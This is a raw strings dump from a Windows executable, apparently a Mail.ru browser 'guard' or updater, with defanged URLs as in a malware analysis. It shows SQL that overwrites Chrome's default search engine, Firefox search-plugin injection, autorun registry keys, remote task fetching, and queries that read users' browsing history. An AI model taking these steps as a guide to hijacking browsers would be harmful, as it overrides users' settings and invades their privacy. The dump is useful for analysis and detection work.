?t@?1??get_instance@?$singleton@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@serialization@boost@@CAAAV?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@34@XZ@4V?$singleton_wrapper@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@detail@34@A
?t@?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@4V?$singleton_wrapper@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@detail@34@A
?t@?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@634@A
?t@?1??get_instance@?$singleton@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@serialization@boost@@CAAAV?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@4@XZ@4V?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@634@A
GetProcessHeap
KERNEL32.dll
SetWindowsHookExW
UnhookWindowsHookEx
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
ReportEventA
ADVAPI32.dll
FindExecutableW
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
WS2_32.dll
PSAPI.DLL
USERENV.dll
WTSAPI32.dll
CRYPT32.dll
VERSION.dll
CreateIoCompletionPort
GetCPInfo
ShellExecuteExW
CoInternetParseUrl
urlmon.dll
PeekNamedPipe
-----BEGIN PUBLIC KEY-----
-----END PUBLIC KEY-----
zcÁ
.?AV?$_Ref_count_obj@VAuditGoogleChrome@mailru@@@std@@
.?AV?$_Ref_count_obj@VAuditFirefox@mailru@@@std@@
.?AVAuditFirefox@mailru@@
.?AVCheckerFirefox@AuditFirefox@mailru@@
.?AVCheckerHomepageFirefox@AuditFirefox@mailru@@
.?AVCheckerDefaultSearchFirefox@AuditFirefox@mailru@@
.?AVCheckerVbmFirefox@AuditFirefox@mailru@@
.?AV?$_Ref_count_obj@VCheckerHomepageFirefox@AuditFirefox@mailru@@@std@@
.?AV?$_Ref_count_obj@VCheckerDefaultSearchFirefox@AuditFirefox@mailru@@@std@@
.?AV?$_Ref_count_obj@VCheckerVbmFirefox@AuditFirefox@mailru@@@std@@
.?AVAuditGoogleChrome@mailru@@
.?AVCheckerCh@AuditGoogleChrome@mailru@@
.?AVCheckerHomepageCh@AuditGoogleChrome@mailru@@
.?AVCheckerDefaultSearchCh@AuditGoogleChrome@mailru@@
.?AVCheckerVbmCh@AuditGoogleChrome@mailru@@
.?AV?$_Ref_count_obj@VCheckerHomepageCh@AuditGoogleChrome@mailru@@@std@@
.?AV?$_Ref_count_obj@VCheckerDefaultSearchCh@AuditGoogleChrome@mailru@@@std@@
.?AV?$_Ref_count_obj@VCheckerVbmCh@AuditGoogleChrome@mailru@@@std@@
.?AV?$_Func_base@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_8b00b026c9439ae5ee123b07f29330c6>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_d67d694cf66593a3e1cbe5e0ac457329>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AVsettings@firefox@mailru@@
.?AVvisual_bookmarks@firefox@mailru@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_852549d506963e7e0155e6efc072a19d>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_8f47c682880de3b4c07e24e1559f18fc>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$thread_data@V?$bind_t@XV?$mf0@XVRemoteTasksExecuter@mailru@@@_mfi@boost@@V?$list1@V?$value@PAVRemoteTasksExecuter@mailru@@@_bi@boost@@@_bi@3@@_bi@boost@@@detail@boost@@
.?AV?$thread_data@V?$bind_t@XV?$mf1@XVRemoteTasksExecuter@mailru@@ABV?$shared_ptr@VTaskInterface@mailru@@@std@@@_mfi@boost@@V?$list2@V?$value@PAVRemoteTasksExecuter@mailru@@@_bi@boost@@V?$value@V?$shared_ptr@VTaskInterface@mailru@@@std@@@23@@_bi@3@@_bi@boost@@@detail@boost@@
.?AVTaskOneTimeWithChromeAutorunPatch@mailru@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_36e85ead181c17858a3fd5b6f23c888c>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_d71f87b5d93256d8ef11999b81c97114>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AV?$_Func_impl@U?$_Callable_obj@V<lambda_ff52a01b8c5e4b0628fdb56e2a8b3e6f>@@$0A@@std@@V?$allocator@V?$_Func_class@XPAV?$reg_keyT@$00@mailru@@@std@@@2@XPAV?$reg_keyT@$00@mailru@@@std@@
.?AVwindows_file_codecvt@@
.PAUattribute_name_info_tag@v2s_mt_nt5@log@boost@@
.?AVexception@sqlite@mailru@@
.?AV?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@
.?AU?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@
.?AUProcessKey@sysinfo@mailru@@
.?AV?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@serialization@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@serialization@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@serialization@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$typeid_wrapper@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$typeid_wrapper@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@
.?AV?$service_base@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@
.?AV?$service_base@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AVconnection_data@downloader_impl@http@mailru@@
.?AVconnection_data_file@downloader_impl@http@mailru@@
.?AVconnection_data_string@downloader_impl@http@mailru@@
.?AV?$_Ref_count@V?$vector@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@V?$allocator@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@@std@@@std@@@std@@
.?AV?$sp_counted_impl_p@Vdownload_limitation@downloader_impl@http@mailru@@@detail@boost@@
.?AV?$sp_counted_impl_p@Vconnection_data_file@downloader_impl@http@mailru@@@detail@boost@@
.?AV?$sp_counted_impl_p@Vconnection_data_string@downloader_impl@http@mailru@@@detail@boost@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_operation@Concurrency@@
.?AVunsupported_os@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
Inappropriate I/O control opera
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
< <$<(<,<
0 0$0(0,0
313C3O3a3m3r3
0%0s0
343f3
8:X:#;i;n;};
8(8&:5:_:
;";';&<5<[<
9%9U9u9
3?4X4
8œ9h9
:&:;:@:{:
4"414&585
0"0)00090
3%3s3
2/2x2c3}3
9$9(9,90949
878<8[8`8
77R7c7o7v7
5#6-676\6
8 8%8*888
? ?$?(?,?0?4?8?
8 8$8(8,8&9
2%3u3z3
9 9$9(9,9
5 5$5(5,50545~5
6$6,666<6
2"2(22282*323
2#20262=2^2
5"=)=2=9=
708}8!:(:
7 7-787@7_7
1 1$1(1,1
0'0-020@0
3#323@3#525@5
: :$:(:,:0:4:
5,5054585<5@5
3 3$3(3,3034383<3
5 5$5(5,50545
4 4$4(4,484<4
6 6$6(6,6064686<6
8 8$8(8,8084888<8
9(9,90949|9
=@>\>`>|>
< <$<0<@<
> >$>(>,>0>4>8><>
8 8$8(8,808
? ?$?(?,?0?4?8?<?
1 1$1(1,101
6 6$6(6,6064686<6@6
8 8$8(8,8084888<8@8
1 1$1(1,1014181<1@1
6 6$6(6,6
2$2,282\2|2
7,787@7`7
2,282\2|2
3 3(343\3
7,787\7|7
:,:8:@:`:
?(?4?<?\?
>$>,>8>\>|>
;(;4;<;\;
1$1,181`1
0 0(040\0
1 1(1,1|1
2 202@2`2
> >$>(>,>0>|>
praetorian.exe
qipguard.exe
BrowserManager.exe
BrowserManagerGUI.exe
QHActiveDefense.exe
QHSafeTray.exe.exe
QHWatchdog.exe
GuardMailRu.exe
JMail.Ru\Sputnik\Report
hXXp://xml.binupdate.mail.ru/audit_config.mrdj
Start new check operation
o failed to parse. New report Created
restore mail.ru for:
operation_type
checker->Check failed, msg =
hXXp://xml.binupdate.mail.ru/sputnik/spmrids.mrdj
hXXp://xml.binupdate.mail.ru/sputnik/spmrids.mrdj successfully fetched
FFExtensions/FFVbm/Url
Hp/Url
Dse/Url
Vbm/Url
Google\Chrome\User Data\Safe Browsing Extension Blacklist
Advapi32.dll
MGoogle/Chrome/User Data
Google/Chrome/Application
Software\Policies\Google\Chrome
hXXp://xml.binupdate.mail.ru/ext_storage.mrdj
Google Chrome
Google/Chrome/User Data/Default
Google/Chrome/Application/chrome.exe
Software/Google/Chrome/BLBeacon
URLS
manifest.json
sqlite3_reset
sqlite3_exec
Web Data
chrome.exe
select k.url from meta m, keywords k where m.key='Default Search Provider ID' and m.value=k.id
select id, short_name from keywords where url like '%go.mail.ru%' COLLATE NOCASE
No go.mail.ru in chromium
SELECT id FROM keywords WHERE keyword = 'mail.ru' COLLATE NOCASE
DELETE FROM keywords WHERE short_name = '@MAIL.RU'
SELECT * FROM keywords
ALTER TABLE keywords ADD COLUMN alternate_urls VARCHAR DEFAULT ''
ALTER TABLE keywords ADD COLUMN search_terms_replacement_key VARCHAR DEFAULT ''
INSERT INTO keywords
id, short_name, keyword, favicon_url, url, show_in_default_list, safe_for_autoreplace, originating_url, date_created, usage_count, input_encodings, suggest_url, prepopulate_id, created_by_policy, instant_url, last_modified, sync_guid
@Mail.Ru','go.mail.ru','hXXp://go.mail.ru/favicon.ico','hXXp://go.mail.ru/search?q={searchTerms}&fr=ntg',1,1,'',1333701777,0,'windows-1251','hXXp://suggests.go.mail.ru/ff3?q={searchTerms}',%PREPOPULATE_ID%,0,'',0,'03095DE3-A6E7-4793-A20C-399A0F4A92E1'
UPDATE keywords SET short_name = '
@Mail.Ru', keyword = 'go.mail.ru', favicon_url = 'hXXp://go.mail.ru/favicon.ico', url = 'hXXp://go.mail.ru/search?q={searchTerms}&fr=ntg%RFR%',show_in_default_list = '1' WHERE id = '%ID%'
SELECT id , prepopulate_id FROM keywords WHERE keyword = 'go.mail.ru' COLLATE NOCASE
SELECT id , prepopulate_id FROM keywords WHERE keyword = 'mail.ru' COLLATE NOCASE
SELECT id, prepopulate_id FROM keywords
' WHERE key = 'Default Search Provider ID'
' WHERE key = 'Default Search Provider ID Backup'
SELECT value FROM meta WHERE key = 'version'
UPDATE keywords SET suggest_url = '%SUGGEST_URL%' WHERE keyword like '%mail.ru%'
%SUGGEST_URL%
^(chrome-extension://)?(\w{32})?/?
Software/Google/Chrome/Extensions
Sync Data Backup/SyncData.sqlite3
hXXps://clients2.google.com/service/update2/crx
hXXp://xml.binupdate.mail.ru/guard/mrids.mrdj?
Extension from url installed
DefaultSearchProviderSearchURL
DefaultSearchProviderKeyword
&%1$=%2%
mmail.ru
VVV.mail.ru
VVV.go.mail.ru
common_process.exe
{27116687-8CD6-4A82-BA83-5099C3A885BF}
{A12C4AB1-F4D0-4771-8C21-613E9D12491F}
{1079004F-E4EF-4A44-9D1F-7C9CE09CE258}
{901B414B-72A2-48C6-8DCD-29388B8B3E40}
{0ED2394C-62B6-4A80-A342-C2CA0B2A4E82}
{E60E6A0E-4092-4965-85BB-AA1ED8EBBC8E}
{ADAC3638-040C-498C-845A-F89B99705444}
{4519D3B5-465C-4AE2-A905-960CA7D5385C}
{F581DE96-9AA1-45C8-8335-B7445525371A}
{DCEF19BB-AB61-48F4-A7CB-6D677D90D1C2}
{B63A6D16-4F50-47C2-9BF7-A5D6E79C9EFD}
{11A1974E-9BEF-4B50-8E2F-9F25FC775BD1}
{3E57F3FE-4397-4DEA-A19A-760BFCD24242}
{603A8599-628C-4F00-A940-A09F1583A23E}
{D33EDE61-8E43-4C1F-9371-6A240B4DA5C9}
{C74622AC-AC0B-44E5-BDC2-EE39A5FD9EC9}
{ABCAA0D8-A892-481F-9492-ACC63768F659}
{8DC7BF6A-58F3-4740-B600-34E37FFADC21}
{4C1D0C36-25B2-4774-80E8-DAE1E7898A1A}
{96AF929E-B8EB-499E-99A8-095E4262BE26}
{027940D4-10B8-43B6-9707-A4EE47618E1D}
{45DA0BF7-F31B-4360-BF9A-8E7374A78916}
{5552B451-2086-4B64-82C6-732B18E41FCD}
{F9CC112D-19A0-455B-8D85-F5E9CB7D5914}
{0E26AC42-4B6E-4C84-8291-A0CAC999E70D}
{CFB9F60E-912D-43B3-91C9-9E06AE17ADE0}
{3CE4F0C3-2143-491F-8F20-27792166C41F}
{66CD85E0-6D8E-444E-9D71-AED8BA171A26}
{4947360E-E26B-4CC9-BB40-F4A30EDCA39E}
{14737ADB-9F88-47E8-A76F-D365509795AC}
chrome-extension://clpdgmdkdnijjbgmnajolnbnjejoeogm/visual-bookmarks.html
chrome-extension://hcncjpganfocbfoenaemagjjopkkindp/visual-bookmarks.html
chrome-extension://jaocgokledfmfebefgbeokdodbbdjhdd/visual-bookmarks.html
chrome-extension://dhngkpgdbpbkopndlpkicfaiffphdkbo/visual-bookmarks.html
)Software\AppDataLow\Software\Mail.Ru\IE_Bar
Software\Mail.Ru\IE_Bar
Software/Mail.Ru/Updater
Software\Mail.Ru\Flags
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall
SOFTWARE/Microsoft/Windows/CurrentVersion/Run
SOFTWARE/Mail.Ru
@Mail.Ru
{09900DE8-1DCA-443F-9243-26FF581438AF}
{58810E75-E249-44C6-B989-11D227263E24}
{91397D20-1446-11D4-8AF4-0040CA1127B6}
{95289393-33EA-4F8D-B952-483415B9C955}
hXXp://mrds.mail.ru/update/2/
hXXp://suggests.go.mail.ru/ie8?q={SearchTerms}
{FFEBBF0A-C22C-4172-89FF-45215A135AC7}
Mail.Ru
iexplore.exe
{37964A3C-4EE8-47b1-8321-34DE2C39BA4D}
{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}
firefox.exe
opera.exe
SOFTWARE/Google/Chrome/Extensions
amigo.exe
nichrome.exe
browser.exe
Yandex.Browser.New
Software/Mail.Ru/ChromeInstaller
hXXp://xml.binupdate.mail.ru/guard/update/version.xml
F777C640-57F8-4ECE-A40B-F571D25C2EFE
.html
opera
launcher.exe
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Google Chrome
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Bromium
Software/Microsoft/Windows/CurrentVersion/Uninstall/Xpom
Software/Microsoft/Windows/CurrentVersion/Uninstall/{1B89BC31-F539-4EBD-B94F-C24705C73433}
Software/Microsoft/Windows/CurrentVersion/Uninstall/YandexBrowser
xpom.exe
Software/Microsoft/Windows/CurrentVersion/Uninstall/xpom
Software/Microsoft/Windows/CurrentVersion/Uninstall/Amigo
google chrome
firefox
Microsoft/Windows/Start Menu
Microsoft/Windows/
tsearch-metadata.json
prefs.js
sessionstore.js
places.sqlite
cookies.sqlite
Mozilla\Firefox\profiles.ini
Mozilla\Firefox
Lsearch.json
Mozilla Firefox
mailru.xml
<SearchPlugin xmlns="hXXp://VVV.mozilla.org/2006/browser/search/" xmlns:os="hXXp://a9.com/-/spec/opensearch/1.1/">
@Mail.Ru</os:ShortName>
@Mail.Ru</os:Description>
<SearchForm>hXXp://VVV.mail.ru/</SearchForm>
<os:Url type="application/x-suggestions json" method="GET" template="hXXp://suggests.go.mail.ru/ff3?q={searchTerms}"></os:Url>
<os:Url type="text/html" method="GET" template="hXXp://go.mail.ru/search"><os:Param name="q" value="{searchTerms}"/>%PARAMS%%RFR%</os:Url>
extensions.ini
ini keys failed
extensions.json
extensions.json not parsed!
localstore.rdf
extensions.sqlite
PMail.Ru\Tmp\ffvisualbookmarks.7z
install.rdf
d.autoreg
extensions.rdf
extensions.cache
install_options.xml
@Mail.Ru
Mail.ru
Firefox
File: %s
SELECT last_visit_time FROM urls order by last_visit_time DESC LIMIT 1
couldn't create instance of IUrlHistoryStg2
EnumUrls failed
FaviconURLFallback
SuggestionsURL
ie.reg
[-HKEY_USERS\
import
reg.exe
*.dll
%1%version.txt?type=%2%&GUID=%3%&rfr=%4%
metric successfully send, url =
metric send failed, url =
Mail.Ru/Id
Software\Microsoft\Windows\CurrentVersion\Run
Software\Mail.ru\Tech\ptls
Software/Mail.Ru/Guard
R.delay
Mail.Ru/mrst
hXXp://xml.binupdate.mail.ru/tasks/shortcuts.mrdj?
url_argument
key_arg
^(http[s]?:\/\/)?(www\.)?([\w\.-] )([:\/].*)?$
Remote tasks execution started
hXXp://xml.binupdate.mail.ru/tasks.mrdj?
added task to executing task array
Software/Microsoft/Windows/CurrentVersion/Run
Syahoo.com
webalta.ru
yambler.net
yafinder.com
Found mail.ru extension of type
KhXXp://mailruupdater.cdnmail.ru/MailRuUpdater.exe
5Software\Mail.ru\Tech\ptls
SSoftware\Mail.Ru
Allow service process execute task
--uac-passed
mru_uac_passed
Guard@Mail\.ru
SwReporter
software_reporter_tool.log
Error parsing reporter logs:
dFailed to update SwReporter data:
since_last_exec
chrome
hXXp://xml.binupdate.mail.ru/tasks/ext_settings.mrdj?
Terminating update.exe
update.exe
hXXp://xml.binupdate.mail.ru/sputnik/spmrids.mrdj?
\bmail\.ru\b
K{61EB20A4-D4D5-4276-A2C9-DCCE8CE9F633}
{A55F9C95-2BB1-4EA2-BC77-DFAAB78832CE}
qip.ru
Start proceed Google Chrome
Google Chrome is done
Google Chrome is not done
Start proceed Firefox
Firefox is done
Firefox is not done
hXXp://xml.binupdate.mail.ru/tasks/sg_settings.mrdj?
hXXp://go.mail.ru/?chverfix=1&fr=chverfix_sg
hXXp://go.mail.ru/search?q={SearchTerms}&ieverfix=1&fr=ieverfix_dse
hXXp://xml.binupdate.mail.ru/tasks/sg_settings.mrdj
hXXp://xml.binupdate.mail.ru/sputnik/spmrids.mrdj successfully fetching failed
Svk.com/audios
ok.ru/music
my.mail.ru/music
e.mail.ru/messages/inbox
vk.com/app
ok.ru/game
ok.ru/app
my.mail.ru/app
games.mail.ru
SELECT id, url, last_visit_time FROM urls where url like '%%%1%%%' order by last_visit_time DESC limit 1
SELECT url, last_visit_date FROM moz_places where url like '%%%1%%%' and guid != '' and guid notnull order by last_visit_date desc limit 1
\Toolbar\Custom\Packages\hXXp://bar-widgets.yandex.ru/packages/approved/176/manifest.xml\Components\smartbox
Yandex\Toolbar\state.json
yasearch-xb\plugins.json
Software\Mail.Ru\Updater
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
uac-passed
Kamigo_tmp.exe
hXXp://binupdate.mail.ru/amigo/version2.xml
internet_tmp.exe
hXXp://binupdate.mail.ru/chrome/version3.xml
internetupdater_tmp.exe
hXXp://binupdate.mail.ru/chrome/version2.xml
0.0.0.0
inttoam_tmp.exe
hXXp://binupdate.mail.ru/chrome/internet_to_amigo.xml
28.0.1501.430
hXXp://binupdate.mail.ru/updater/version.xml
mrutmp.exe
.mru_update_service
C:\logging
amsg
last_chrome
ovr_chrome
Google/Chrome/User Data/Default/History
hXXp://xml.binupdate.mail.ru/friends.mrdj
oUpdater.Mail.Ru
Mail.Ru Group
Updater.Mail.Ru exist
